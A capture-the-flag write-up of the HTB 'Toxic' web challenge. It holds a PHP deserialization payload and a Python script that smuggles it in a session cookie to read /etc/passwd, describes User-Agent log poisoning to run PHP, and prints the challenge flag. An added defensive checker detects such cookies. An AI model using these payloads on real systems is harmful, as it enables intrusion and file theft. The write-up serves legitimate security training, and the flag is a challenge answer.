Toxic | HTB Web Challenge
In the given source code we can spot that it is vulnerable to deserialization.
The PageModel class has the magic method __destruct(), which can be used to exploit the deserialization.
payload=
O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}
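import requests
from itsdangerous import base64_encode

# Class name and file path placed into the serialized object
a = "PageModel"
b = "/etc/passwd"
# PHP serialize() format: O:<name length>:"<class>":<property count>:{s:<length>:"<value>";...}
payload = 'O:' + str(len(a)) + ':"' + a + '":1:{s:4:"file";s:' + str(len(b)) + ':"' + b + '";}'
payload = base64_encode(payload).decode()
# The base64-encoded object goes into the PHPSESSID cookie; the request is routed through a local proxy
r = requests.get("http://83.136.249.57:52345/", cookies={"PHPSESSID": payload}, proxies={"http": "http://127.0.0.1:8080/"})
print(r.text)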
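A defender-side check for the cookie format above, as an added example that is not part of the original write-up or the challenge's code: it decodes a cookie value, walks the PHP serialize() tokens, and reports file paths that resolve outside an expected directory. The function names and the `/www/` prefix are assumptions made for illustration.

```python
import base64
import binascii
import posixpath
import re
from urllib.parse import unquote

# Header of a serialized object: O:<name length>:"<class>":<property count>:{
OBJECT_HEADER = re.compile(rb'O:(\d+):"([^"]*)":(\d+):\{')
# Header of a serialized string: s:<byte length>:"
STRING_HEADER = re.compile(rb's:(\d+):"')

def scan_serialized(data: bytes):
    """Return (class names, string values) found in PHP-serialized data."""
    classes, strings, pos = [], [], 0
    while pos < len(data):
        obj = OBJECT_HEADER.match(data, pos)
        if obj and int(obj.group(1)) == len(obj.group(2)):
            classes.append(obj.group(2).decode("latin-1"))
            pos = obj.end()
            continue
        s = STRING_HEADER.match(data, pos)
        if s:
            start, end = s.end(), s.end() + int(s.group(1))
            # Trust the declared byte length, then require the closing '";'
            if data[end:end + 2] == b'";':
                strings.append(data[start:end].decode("latin-1"))
                pos = end + 2
                continue
        pos += 1
    return classes, strings

def flag_cookie(value: str, allowed_prefix: str = "/www/"):
    """Return absolute paths in the cookie's object that leave allowed_prefix
    (the default prefix is an assumed web root, not taken from the page)."""
    value = unquote(value)
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
    except (binascii.Error, ValueError):
        return []
    classes, strings = scan_serialized(raw)
    if not classes:
        return []  # no serialized object in this cookie
    paths = [posixpath.normpath(s) for s in strings if s.startswith("/")]
    return [p for p in paths if not (p + "/").startswith(allowed_prefix)]

# Constructed sample: the payload string shown on this page, base64-encoded
SAMPLE = base64.b64encode(b'O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}').decode()

if __name__ == "__main__":
    print(flag_cookie(SAMPLE))
```

Paths are normalized before the prefix comparison, so a value such as `/www/../etc/passwd` is reported as `/etc/passwd`.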
The flag's file name is random, so we need to find a way around that.
In the Dockerfile we can find the path /etc/nginx/nginx.conf.
Reading this file, we get the path to the access log: /var/log/nginx/access.log
In the access log we see that the User-Agent is printed.
We can try injecting PHP code:
And it works 🥲 Let's get the flag.
Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}
:octocat: Happy Hacking :octocat: